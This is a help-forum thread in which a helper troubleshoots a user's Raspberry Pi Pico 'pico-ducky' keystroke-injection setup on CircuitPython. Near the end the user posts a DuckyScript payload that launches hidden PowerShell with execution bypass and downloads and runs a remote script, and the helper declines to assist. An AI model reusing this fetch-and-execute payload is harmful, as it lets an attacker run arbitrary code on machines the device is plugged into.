#HID Pico problem
1 messages · Page 1 of 1 (latest)
ok, so this is ducky. did you try some simple script? Are the characters being sent at all. the .vbs stuff is probably disabled
lil embarrsing :))))... alr let me look up the .vbs much thanks
ok so im not sure if your familar with the github page called "dbisu" but i installed a python file called "duckytopython.py" and its supposed to work with ducky scripts the problem is that the pico is showing up as a storage device insted as a hid device
it should show up both as a storage device and an HID device.
ive tried and tried please help me out if you have the time
what problems are you still having?
it wont execut "payload.dd"
i deleted it yesterday to in order to see if it had any problems with the code but it wont run
either way
is it a Pico W or a plain pico? If you connect to the board via a terminal program, what do you see when it starts up?
You're running MicroPython. https://github.com/dbisu/pico-ducky is written for CircuitPython. Get the UF2 for CircuitPython here: https://circuitpython.org/board/raspberry_pi_pico/
i just installed it a minute beacuse it wasent recognized by thonny
you can put Thonny in CircuitPython mode
Or use Mu, or just use a terminal program like Tera Term.
Look in Device Manager->Ports and see whether a serial port appears when you plug in the board. It may not be COM5; it may be a different port
yes it is "COM4"
can you switch Thonny to COM4?
Done!
ok, so now start the program by typing ctrl-D
you have to put back all your program files. "Hello World!" is what is in an empty CIRCUITPY
you can just copy/paste the text; it's easier to read than screen shots
sorry.. what program files?
just did i got this "code.py output:
Traceback (most recent call last):
File "code.py", line 14, in <module>
File "duckyinpython.py", line 9, in <module>
File "adafruit_debouncer.py", line 32, in <module>
ImportError: no module named 'adafruit_ticks.ticks_ms'
Code done running.
Adafruit CircuitPython 8.2.9 on 2023-12-06; Raspberry Pi Pico with rp2040
"
ok, you need to add the adafruit_ticks library. It was in the screenshot above. I guess you just forgot to copy it over
okaii done..now it just tells me to soft reboot
(Done)yes just did..
so it should just run now
i pressed "ctrl +d " it gave me this again "code.py output:
]0;🐍code.py | 8.2.9\Traceback (most recent call last):
File "code.py", line 14, in <module>
File "duckyinpython.py", line 9, in <module>
File "adafruit_debouncer.py", line 32, in <module>
ImportError: no module named 'adafruit_ticks.ticks_ms'
do you have adafruit_ticks.mpy in CIRCUITPY\lib?
adafruit_ticks is in its own folder. It should not be. is adafruit_ticks.mpy inside adafruit_ticks? Take it out and put it immediately under lib, and remove the now empty adafruit_ticks folder
projects.toml and requiremnts.txt are in ticks folder
place adafruit_ticks folder under lib?
you don't need those. There should not be an adafruit_ticks folder. There should just be an adafruit_ticks.mpy file, immediately under lib
okaii so. it work for 25%.. it only open up "WINDOWS + R" and writes "notepad" short after it open up "file exploerer" and ten restarts my computer"h
it keeps reseting my computer
well, maybe the payload is set up to do that. Is it doing ctrl-alt-del or alt-f4 or something?
could you upload the payload.dd here? Use the + to the left
or is it the same one as previously with the rick roll
it sometimes run two scripts at the same time and sometimes just make a gray see trough screen and its just crashes
it wont let me send it trough copy and paste
let me try one more time
the matrix wake up
The "ALT F4" at the end is going to start a shutdown sequence, though usually it prompts you with a dialog box. Just click on the desktop and then do alt-F4, and I think you will see what I mean
i ran this script and it stopped working again GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https://raw.githubusercontent.com/I-Am-Jakoby/hak5-submissions/main/OMG/Payloads/OMG-AcidBurn/AcidBurn.ps1?dl=1; invoke-expression $pl
ENTER
almost had a heart attack :))))
yes, I am not going to help with malicious hacking scripts